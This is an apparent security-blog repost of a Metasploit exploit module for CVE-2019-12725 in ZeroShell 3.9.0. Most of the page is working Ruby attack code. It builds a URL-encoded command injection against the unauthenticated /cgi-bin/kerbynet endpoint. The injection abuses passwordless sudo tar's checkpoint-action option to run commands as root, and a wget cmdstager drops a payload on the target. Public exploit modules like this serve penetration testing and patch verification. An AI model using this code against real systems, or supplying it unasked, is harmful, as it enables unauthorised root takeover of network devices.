Monday, June 24, 2024

ZeroShell 3.9.0 – ‘cgi-bin/kerbynet’ Remote Root Command Injection

CVE: 2019-12725

Platform: LINUX

Date: 2020-11-24

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Zeroshell 3.9.0 Remote Command Execution',
      'Description'    => %q{
        This module exploits an unauthenticated command injection vulnerability 
        found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url. 
        As sudo is configured to execute /bin/tar without a password (NOPASSWD)
        it is possible to run root commands using the "checkpoint" tar options.
      },
      'Author'         => [
        'Juan Manuel Fernandez', # Vulnerability discovery
        'Giuseppe Fuggiano <giuseppe[dot]fuggiano[at]gmail.com>', # Metasploit module
      ],
      'References'     => [
        ['CVE', '2019-12725'],
        ['URL', 'https://www.tarlogic.com/advisories/zeroshell-rce-root.txt'],
        ['URL', 'https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py']
      ],
      'DisclosureDate' => 'Jul 17 2019',
      'License'        => MSF_LICENSE,
      'Privileged'     => true, 
      'Platform'       => [ 'unix', 'linux' ],
      'Arch'           => [ ARCH_X86 ],
      'Targets'        => [
       ['Zeroshell 3.9.0 (x86)', {
         'Platform'    => 'linux',
         'Arch'        => ARCH_X86,
        }],
      ],
      'DefaultTarget'  => 0,
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
      ])
  end

  def execute_command(cmd, opts = {})
    command_payload  = "%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22#{filter_bad_chars(cmd)}%22%0A%27"

    print_status("Sending stager payload...")

    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/cgi-bin/kerbynet',
      'encode_params' => false,
      'vars_get' => {
        'Action' => 'x509view',
        'Section' => 'NoAuthREQ',
        'User' => '',
        'x509type' => command_payload
      }
    )

    return res
  end

  def filter_bad_chars(cmd)
    cmd.gsub!(/chmod \+x/, 'chmod 777')
    cmd.gsub!(/;/, " %0A ")
    cmd.gsub!(/ /, '+')
    cmd.gsub!(/\//, '%2F')
    return cmd
  end

  def check
    res = execute_command('id')
    if res && res.body.include?("uid=0(root)")
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_status("Exploiting...")
    execute_cmdstager(flavor: :wget, delay: 5)
  end

end
            
Bookmark
ClosePlease login
Share the word, let's increase Cybersecurity Awareness as we know it
Recommended:  WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting
- Sponsored -

Sponsored Offer

Unleash the Power of the Cloud: Grab $200 Credit for 60 Days on DigitalOcean!

Digital ocean free 200

Discover more infosec

User Avatar
Steven Black (n0tst3)
Hello! I'm Steve, an independent security researcher, and analyst from Scotland, UK. I've had an avid interest in Computers, Technology and Security since my early teens. 20 years on, and, it's a whole lot more complicated... I've assisted Governments, Individuals and Organizations throughout the world. Including; US DOJ, NHS UK, GOV UK. I'll often reblog infosec-related articles that I find interesting. On the RiSec website, You'll also find a variety of write-ups, tutorials and much more!

more infosec reads

Subscribe for weekly updates

explore

more

security